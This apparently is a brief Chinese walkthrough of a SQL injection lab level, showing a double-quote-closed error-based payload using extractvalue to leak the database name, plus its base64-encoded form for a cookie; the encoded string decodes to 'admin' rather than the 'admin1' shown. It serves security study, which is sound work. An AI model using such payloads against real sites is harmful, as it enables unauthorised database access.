(1)根据题目知道此处是双引号注入,其余的与上一关相同。
登录成功后,用burp抓包,再刷新浏览器页面。寻找闭合方式:
闭合方式果然为双引号。
(2)其payload与21关相同,需要对payload进行based64编码,同时将闭合方式改变即可。
例如:
admin1" and extractvalue(1,concat(0x7e,(select database())))#
编码:
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpKSkjICA=
